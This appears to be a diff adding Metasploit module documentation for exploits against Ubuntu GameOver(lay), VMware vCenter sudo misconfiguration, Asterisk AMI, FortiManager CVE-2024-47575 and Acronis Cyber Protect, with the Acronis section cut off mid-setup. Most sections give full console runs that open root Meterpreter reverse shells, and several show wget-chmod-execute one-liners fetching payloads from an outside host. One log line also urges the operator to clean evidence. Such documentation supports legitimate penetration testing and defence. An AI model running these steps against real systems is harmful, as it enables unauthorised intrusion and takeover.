+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux_Binary
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/gameoverlay_privesc) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected Ubuntu version: Jammy Jellyfish
+[*] Detected kernel version: 5.19.0-41-generic
+[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
+[*] Creating directory to store payload: /tmp/ODBpneOXk/
+[*] Creating directory /tmp/ODBpneOXk/
+[*] /tmp/ODBpneOXk/ created
+[*] Creating directory /tmp/ODBpneOXk/
+[*] Creating directory /tmp/ODBpneOXk/
+[*] /tmp/ODBpneOXk/ created
+[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/
+[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/
+[*] /tmp/ODBpneOXk/bmbtPAX/ created
+[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/
+[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/
+[*] /tmp/ODBpneOXk/JtNbwLXJKw/ created
+[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/
+[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/
+[*] /tmp/ODBpneOXk/hEhbByWL/ created
+[*] Creating directory /tmp/ODBpneOXk/yvvSFre/
+[*] Creating directory /tmp/ODBpneOXk/yvvSFre/
+[*] /tmp/ODBpneOXk/yvvSFre/ created
+[*] Writing payload: /tmp/ODBpneOXk/pSueaCXrnzH
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 10.5.132.129
+[*] rm: cannot remove '/tmp/ODBpneOXk/yvvSFre/': Device or resource busy
+[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.132.129:44400) at 2024-12-18 14:02:42 -0600
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 10.5.132.129
+OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
@@ -0,0 +1,307 @@
+## Vulnerable Application
+
+VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D
+contains multiple local privilege escalation vulnerabilities
+due to misconfiguration of sudo. An authenticated local user
+with non-administrative privileges may exploit these issues
+to elevate privileges to root on vCenter Server Appliance.
+
+Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get an initial user level shell
+4. Do: `use exploit/linux/local/vcenter_sudo_lpe`
+5. Do: `set lhost <lhost>`
+6. Do: `set sessoin <session>`
+7. Do: `run`
+8. You should get a root shell.
+
+## Options
+
+## Scenarios
+
+### VMware vCenter Server Appliance 8.0.0.10000 (VMware-VCSA-all-8.0.0-20519528.iso)
+
+#### `pod` user
+
+Start our first handler
+
+```
+[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181
+srvport => 8181
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7
+target => 7
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Using URL: http://2.2.2.2:8181/wS8RErnHVLh
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO 5Y0wnQU5 --no-check-certificate http://2.2.2.2:8181/wS8RErnHVLh; chmod +x 5Y0wnQU5; ./5Y0wnQU5& disown
+```
+
+Setup, SSH in, start a shell, allow `pod` login access, then change user and start our payload.
+
+```
+PS C:\Users\h00die> ssh root@1.1.1.1
+
+VMware vCenter Server Appliance 8.0.0.10000
+
+(root@1.1.1.1) Password:
+Connected to service
+
+    * List APIs: "help api list"
+    * List Plugins: "help pi list"
+    * Launch BASH: "shell"
+
+Command> api com.vmware.appliance.version1.system.version.get
+Version:
+   Version: 8.0.0.10000
+   Product: VMware vCenter Server
+   Build: 20519528
+   Type: ''
+   Summary: VMware vCenter Server 8.0
+   Releasedate: October 11, 2022
+   Installtime: ''
+
+Command> shell
+Shell access is granted to root
+root@localhost [ ~ ]# usermod -s /bin/bash pod
+/usr/sbin/usermod.bk -s /bin/bash pod
+root@localhost [ ~ ]# su pod
+pod@localhost [ /root ]$ cd /tmp
+pod@localhost [ /tmp ]$ wget -qO smswhnVK --no-check-certificate http://2.2.2.2:8181/xLaIAPnwiuPr9; chmod +x smswhnVK; ./smswhnVK& disown
+[1] 22325
+```
+
+Priv Esc. Autocheck disabled due to an incomplete install.
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/tmp) > getuid
+Server username: pod
+(Meterpreter 1)(/tmp) > background
+[*] Backgrounding session 1...
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set verbose true
+verbose => true
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lport 9879
+lport => 9879
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false
+autocheck => false
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:9879 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.
+[*] Creating directory /tmp/appliance
+[*] /tmp/appliance created
+[*] Writing '/tmp/appliance/9OP6wIQJl9' (250 bytes) ...
+[*] Launching exploit...
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 1.1.1.1
+[+] Deleted /tmp/appliance/9OP6wIQJl9
+[+] Deleted /tmp/appliance/__init__.py
+[+] Deleted /tmp/appliance
+[*] Meterpreter session 2 opened (2.2.2.2:9879 -> 1.1.1.1:34894) at 2024-11-18 07:24:13 -0500
+
+(Meterpreter 2)(/tmp) > getuid
+Server username: root
+(Meterpreter 2)(/tmp) > background
+[*] Backgrounding session 2...
+[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/tmp) > getuid
+Server username: pod
+```
+
+#### Operator Group
+
+If the user `mal` exists, use that. If not, follow the bellow instructions
+
+Make a user in the operator group:
+
+```
+sudo useradd -m -s /bin/bash operator1
+sudo usermod -aG users operator1
+sudo usermod -aG operator operator1
+```
+
+This may be enough, but on my install which didn't complete I had to add the sudo entry manually.
+
+```
+visudo
+```
+
+Add the following at the end:
+
+```
+User_Alias PYTHON_USERS = operator1
+Defaults:PYTHON_USERS env_keep += "PYTHONPATH"
+```
+
+Start our first handler
+
+```
+[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181
+srvport => 8181
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7
+target => 7
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Using URL: http://2.2.2.2:8181/eEgibKL2K
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO JSlY5cPV --no-check-certificate http://2.2.2.2:8181/eEgibKL2K; chmod +x JSlY5cPV; ./JSlY5cPV& disown
+[*] Sending stage (3045380 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500
+```
+
+Priv Esc. Autocheck disabled due to an incomplete install.
+
+```
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870
+lport => 9870
+[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set verbose true
+verbose => true
+[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false
+autocheck => false
+[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:9870 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Utilizing PYTHONPATH exploitation method for operator group.
+[*] Writing '/tmp/Ma5gGdnt' (250 bytes) ...
+[*] Launching exploit...
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 1.1.1.1
+[+] Deleted /tmp/Ma5gGdnt
+[+] Deleted /tmp/spwd.py
+[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:40550) at 2024-11-18 16:27:28 -0500
+
+
+(Meterpreter 2)(/tmp) > 
+(Meterpreter 2)(/tmp) > getuid
+Server username: root
+(Meterpreter 2)(/tmp) > background
+[*] Backgrounding session 2...
+s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/tmp) > getuid
+Server username: operator1
+```
+
+#### Admin Group
+
+If the user `admin` exists, use that. If not, follow the bellow instructions
+
+Make a user in the operator group:
+
+```
+useradd -m -s /bin/bash admin
+usermod -aG admin admin
+usermod -aG users admin
+```
+
+Start our first handler
+
+```
+[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181
+srvport => 8181
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7
+target => 7
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Using URL: http://2.2.2.2:8181/Hul7qG
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO IsMq60f5 --no-check-certificate http://2.2.2.2:8181/Hul7qG; chmod +x IsMq60f5; ./IsMq60f5& disown
+[*] Sending stage (3045380 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500
+```
+
+Priv Esc
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870
+lport => 9870
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set verbose true
+verbose => true
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false
+autocheck => false
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:9870 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Exploitable version detected: 8.0.0.20519528
+[+] User is vulnerable
+[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (admin:["users", "admin"]) are vulnerable
+[*] Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.
+[*] Creating directory /tmp/appliance
+[*] /tmp/appliance created
+[*] Writing '/tmp/appliance/NKdii1ux' (250 bytes) ...
+[*] Launching exploit...
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 1.1.1.1
+[+] Deleted /tmp/appliance/NKdii1ux
+[+] Deleted /tmp/appliance/__init__.py
+[+] Deleted /tmp/appliance
+[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:58686) at 2024-11-21 04:00:08 -0500
+
+(Meterpreter 2)(/tmp) > getuid
+Server username: root
+(Meterpreter 2)(/tmp) > background
+[*] Backgrounding session 2...
+s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/tmp) > getuid
+Server username: admin
+(Meterpreter 1)(/tmp) > 
+```
@@ -0,0 +1,171 @@
+## Vulnerable Application
+
+On Asterisk, prior to versions 18.24.2, 20.9.2, and 21.4.2 and certified-asterisk
+versions 18.9-cert11 and 20.7-cert2, an AMI user with 'write=originate' may change
+all configuration files in the '/etc/asterisk/' directory. Writing a new extension
+can be created which performs a system command to achieve RCE as the asterisk service
+user (typically asterisk).
+
+Default parking lot in FreePBX is called "Default lot" on the website interface,
+however its actually 'parkedcalls'.
+
+Tested against Asterisk 19.8.0 and 18.16.0 on Freepbx SNG7-PBX16-64bit-2302-1.
+
+### Install
+
+One easy method, while outdated, is using the FreePBX ISO.
+
+1. Boot to ISO and install the system. Choose Asterisk 19
+2. Visit the web interface on port 80
+3. Complete initial setup, make sure to not do updates.
+4. login
+5. Click FreePBX Administration
+6. Click the hamburger > Applications > Parking
+7. Check the parking extension and name (`70` and `Default lot` are the defaults)
+8. Login (ssh/local) and edit `/etc/asterisk/manager.conf`
+  1. Under `[general]`:
+    1. Change `bindaddr` value to `0.0.0.0`
+    2. If you'd like to test the version checking, grab admin's secret, and set `permit=0.0.0.0/0.0.0.0`
+    3. Add the following at the bottom of the file:
+    ```
+[testuser]
+secret=testuser
+write=originate
+permit=0.0.0.0/255.255.255.0
+    ```
+9. reboot box (after boot, it may take SEVERAL minutes for asterisk to come up)
+
+Default parking lot is called "Default lot" in the website interface, however its actually `parkedcalls`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/misc/asterisk_ami_originate_auth_rce`
+1. Do: `set rhosts <rhost>`
+1. Do: `set lhost <lhost>`
+1. Do: `set username <username>`
+1. Do: `set password <password>`
+1. You should get a shell.
+
+## Options
+
+### CONF
+
+The extensions configuration file location. Defaults to `/etc/asterisk/extensions.conf`
+
+### PARKINGLOT
+
+The extensions and name of the parking lot. Defaults to `70@parkedcalls`
+
+### EXTENSION
+
+The extension number to backdoor. Defaults to a random number between 3-5 digits.
+
+## Scenarios
+
+### FreePBX 12.7.8-2302-1.sng7 (SNG7-PBX16-64bit-2302-1) with Asterisk 19
+
+```
+resource (ami.rb)> use exploit/linux/misc/asterisk_ami_originate_auth_rce
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+resource (ami.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (ami.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (ami.rb)> set username testuser
+username => testuser
+resource (ami.rb)> set password testuser
+password => testuser
+resource (ami.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set parkinglot 700@parkedcalls
+parkinglot => 700@parkedcalls
+msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:5038 - Running automatic check ("set AutoCheck false" to disable)
+[*] 1.1.1.1:5038 - Connecting...
+[*] 1.1.1.1:5038 - Found Asterisk Call Manager version 8.0.2
+[*] 1.1.1.1:5038 - Authenticating as 'testuser'
+[!] 1.1.1.1:5038 - No active DB -- Credential data will not be saved!
+[+] 1.1.1.1:5038 - Authenticated successfully
+[*] 1.1.1.1:5038 - Checking Asterisk version
+[!] 1.1.1.1:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
+[*] 1.1.1.1:5038 - Connecting...
+[*] 1.1.1.1:5038 - Found Asterisk Call Manager version 8.0.2
+[*] 1.1.1.1:5038 - Authenticating as 'testuser'
+[+] 1.1.1.1:5038 - Authenticated successfully
+[*] 1.1.1.1:5038 - Using new context name: EfVeZSDeGcn
+[*] 1.1.1.1:5038 - Loading conf file
+[+] 1.1.1.1:5038 -   Response: Success, Message: Originate successfully queued
+[*] 1.1.1.1:5038 - Setting backdoor
+[+] 1.1.1.1:5038 -   Response: Success, Message: Originate successfully queued
+[*] 1.1.1.1:5038 - Reloading config
+[+] 1.1.1.1:5038 -   Response: Success, Message: Originate successfully queued
+[*] 1.1.1.1:5038 - Triggering shellcode
+[*] Sending stage (24772 bytes) to 1.1.1.1
+[+] 1.1.1.1:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43812) at 2024-11-04 09:09:57 -0500
+
+meterpreter > shell
+Process 5831 created.
+Channel 1 created.
+asterisk -rx "core show version"
+Asterisk 19.8.0 built by mockbuild @ jenkins7 on a x86_64 running Linux on 2023-01-16 07:07:49 UTC
+cat /etc/schmooze/pbx-version
+12.7.8-2302-1.sng7
+```
+
+### FreePBX 12.7.8-2302-1.sng7 (SNG7-PBX16-64bit-2302-1) with Asterisk 18
+
+```
+resource (ami.rb)> use exploit/linux/misc/asterisk_ami_originate_auth_rce
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+resource (ami.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (ami.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (ami.rb)> set username testuser
+username => testuser
+resource (ami.rb)> set password testuser
+password => testuser
+resource (ami.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set parkinglot 700@parkedcalls
+parkinglot => 700@parkedcalls
+msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:5038 - Running automatic check ("set AutoCheck false" to disable)
+[*] 1.1.1.1:5038 - Connecting...
+[*] 1.1.1.1:5038 - Found Asterisk Call Manager version 7.0.3
+[*] 1.1.1.1:5038 - Authenticating as 'testuser'
+[!] 1.1.1.1:5038 - No active DB -- Credential data will not be saved!
+[+] 1.1.1.1:5038 - Authenticated successfully
+[*] 1.1.1.1:5038 - Checking Asterisk version
+[!] 1.1.1.1:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
+[*] 1.1.1.1:5038 - Connecting...
+[*] 1.1.1.1:5038 - Found Asterisk Call Manager version 7.0.3
+[*] 1.1.1.1:5038 - Authenticating as 'testuser'
+[+] 1.1.1.1:5038 - Authenticated successfully
+[*] 1.1.1.1:5038 - Using new context name: fSvWOLdAx
+[*] 1.1.1.1:5038 - Loading conf file
+[+] 1.1.1.1:5038 -   Response: Success, Message: Originate successfully queued
+[*] 1.1.1.1:5038 - Setting backdoor
+[+] 1.1.1.1:5038 -   Response: Success, Message: Originate successfully queued
+[*] 1.1.1.1:5038 - Reloading config
+[+] 1.1.1.1:5038 -   Response: Success, Message: Originate successfully queued
+[*] 1.1.1.1:5038 - Triggering shellcode
+[*] Sending stage (24772 bytes) to 1.1.1.1
+[+] 1.1.1.1:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:53468) at 2024-11-04 09:37:35 -0500
+
+meterpreter > shell
+Process 3977 created.
+Channel 1 created.
+asterisk -rx "core show version"
+Asterisk 18.16.0 built by mockbuild @ jenkins7 on a x86_64 running Linux on 2023-01-16 06:50:30 UTC
+cat /etc/schmooze/pbx-version
+12.7.8-2302-1.sng7
+```
@@ -0,0 +1,146 @@
+## Vulnerable Application
+This module exploits a missing authentication vulnerability affecting FortiManager and FortiManager
+Cloud devices to achieve unauthenticated RCE with root privileges.
+
+For a full technical analysis, please see our
+AttackerKB [Rapid7 Analysis](https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis).
+
+The vulnerable FortiManager versions are:
+* 7.6.0
+* 7.4.0 through 7.4.4
+* 7.2.0 through 7.2.7
+* 7.0.0 through 7.0.12
+* 6.4.0 through 6.4.14
+* 6.2.0 through 6.2.12
+
+The vulnerable FortiManager Cloud versions are:
+* 7.4.1 through 7.4.4
+* 7.2.1 through 7.2.7
+* 7.0.1 through 7.0.12
+* 6.4 (all versions).
+
+## Testing
+You will need to acquire a firmware image for a suitable version of FortiManager. For example, to deploy FortiManager
+`7.6.0` as a VM on HyperV, download the file `FMG_VM64_HV-v7.6.0.F-build3340-FORTINET.out.hyperv.zip`.
+* Extract the contents of this archive. You will get a primary hard drive image `fmg.vhd`.
+* In HyperV:
+  * Create a new virtual machine with 4096 MB RAM and 1 vCPU.
+  * Add 4 network adapters, the first must be connected to your external network (or similar) which can assigned an IP
+via DHCP. The remaining 3 adapters can remain unconnected.
+  * In the IDE controller, add a new hard drive and select the `fmg.vhd` image.
+  * In the IDE controller, add a new hard drive and create an empty image (128GB). This is used by the device to store
+data after setup.
+  * Boot the machine.
+* The console will display the FortiManager boot sequence and drop you to a login prompt. The default username is `admin`
+and the default password is empty. After you log in as admin the first time, you will be instructed to set a new admin
+password.
+* After logging in, you will be dropped to a CLI shell. Run the command `get system interface port1` in order to
+discover the IP address of your new FortiManager device.
+* At this point you can successfully exploit an unlicensed FortiManager device. Alternatively you can acquire a trial
+license of FortiManager and complete the setup by visiting `https://<FORTIMANAGER_IP>/` in your browser.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/misc/fortimanager_rce_cve_2024_47575`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set LHOST eth0`
+5. `set LPORT 4444`
+6. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
+7. `check`
+8. `exploit`
+
+## Options
+The exploit provides a suitable client certificate/key pair by default, however we can let a user configure
+a different certificate/key pair to use if they want. The user can also override the serial number and
+platform if needed, but the exploit will try to detect the serial number and platform from the certificate
+by default.
+
+### ClientCert
+A file path to an x509 cert, signed by Fortinet, with a serial number in the CN
+
+### ClientKey
+A file path to the corresponding private key for the ClientCert.
+
+### ClientSerialNumber
+If set, use this serial number instead of extracting one from the ClientCert.
+
+### ClientPlatform
+If set, use this platform instead of determining the platform at runtime.
+
+## Scenarios
+
+### Default
+
+```
+msf6 exploit(linux/misc/fortimanager_rce_cve_2024_47575) > set RHOST 192.168.86.93
+RHOST => 192.168.86.93
+msf6 exploit(linux/misc/fortimanager_rce_cve_2024_47575) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(linux/misc/fortimanager_rce_cve_2024_47575) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(linux/misc/fortimanager_rce_cve_2024_47575) > set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/misc/fortimanager_rce_cve_2024_47575) > show options
+
+Module options (exploit/linux/misc/fortimanager_rce_cve_2024_47575):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   ClientCert                           no        A file path to an x509 cert, signed by Fortinet, with a serial number in the CN
+   ClientKey                            no        A file path to the corresponding private key for the ClientCert.
+   ClientPlatform                       no        If set, use this platform instead of determining the platform at runtime.
+   ClientSerialNumber                   no        If set, use this serial number instead of extracting one from the ClientCert.
+   RHOSTS              192.168.86.93    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                                  metasploit.html
+   RPORT               541              yes       The target port (TCP)
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GfogzcPTWbTb     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/misc/fortimanager_rce_cve_2024_47575) > check
+[*] 192.168.86.93:541 - The service is running, but could not be validated. Detected Fortinet FortiManager
+msf6 exploit(linux/misc/fortimanager_rce_cve_2024_47575) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] 192.168.86.93:541 - Client certificate common name: FMG-VM0000000000
+[*] 192.168.86.93:541 - Using client serial number 'FMG-VM0000000000' and platform 'FortiManager-VM64'.
+[*] 192.168.86.93:541 - Connecting...
+[*] 192.168.86.93:541 - Registering device...
+[*] 192.168.86.93:541 - Creating channel...
+[*] 192.168.86.93:541 - Triggering...
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.93:16620) at 2024-11-15 12:48:15 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.86.93
+OS           :  (Linux 5.15.109)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,354 @@
+## Vulnerable Application
+Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all, compute, storage and application resources.
+Businesses and Service Providers are using it to protect and backup all IT assets in their IT environment.
+The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous registration of new protect/backup agents
+on new endpoints. This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance.
+As the management web console is running on the same port as the API for the agents, this bearer token is also valid for any actions
+on the web console. This allows an attacker with network access to the appliance to start the registration of a new agent,
+retrieve a bearer token that provides admin access to the available functions in the web console.
+
+The web console contains multiple possibilities to execute arbitrary commands on both the agents (e.g., via PreCommands for a backup)
+and also the appliance (e.g., via a Validation job on the agent of the appliance).
+These options can easily be set with the provided bearer token, which leads to a complete compromise of all agents and the appliance
+itself.
+
+You can either use the module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure` to collect target info for exploitation
+in this module. Or just run this module standalone and it will try to exploit the first online endpoint matching your target and
+payload settings configured at the module.
+
+Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+The following releases were tested.
+
+**Acronis Cyber Protect 15  ISO appliances:**
+* Acronis Cyber Protect 15 Build 28503
+* Acronis Cyber Protect 15 Build 27009
+* Acronis Cyber Protect 15 Build 26981
+* Acronis Cyber Protect 15 Build 26172
+
+**Acronis Cyber Protect 12.5  ISO appliances:**
+* Acronis Cyber Protect 12.5 Build 16428
+* Acronis Cyber Protect 12.5 Build 16386
+* Acronis Cyber Protect 12.5 Build 14330
+* Acronis Cyber Protect 12.5 Build 11010
+
+## Installation steps to install the Acronis Cyber Protect/Backup appliance
+* Install the virtualization engine VMware Fusion on your preferred platform.
+* [Install VMware Fusion on MacOS](https://knowledge.broadcom.com/external/article/315638/download-and-install-vmware-fusion.html).
+* [Download ISO Image](https://care.acronis.com/s/article/71847-Acronis-Cyber-Protect-Links-to-download-installation-files?language=en_US).
+* Install the Acronis iso image in your virtualization engine by unzipping the appliance image and import the `ovf` image.
+* During the boot, select `Install appliance` and  configure the installation settings such as setting the root password and IP address
+* using the option `change installation settings`.
+* Boot up the VM and should be able to access the Acronis Cyber Protect/Backup appliance either thru the console, `ssh` on port `22`
+* via the `webui` via `http://your_ip:9877`.
+* Ensure that you have registered yourself on the Acronis Web site and applied for the 30-days trial for Acronis Cyber Protect.
+* Login into the appliance via the `webui`.
+* Follow the license instructions to apply your 30-day trial license.
+
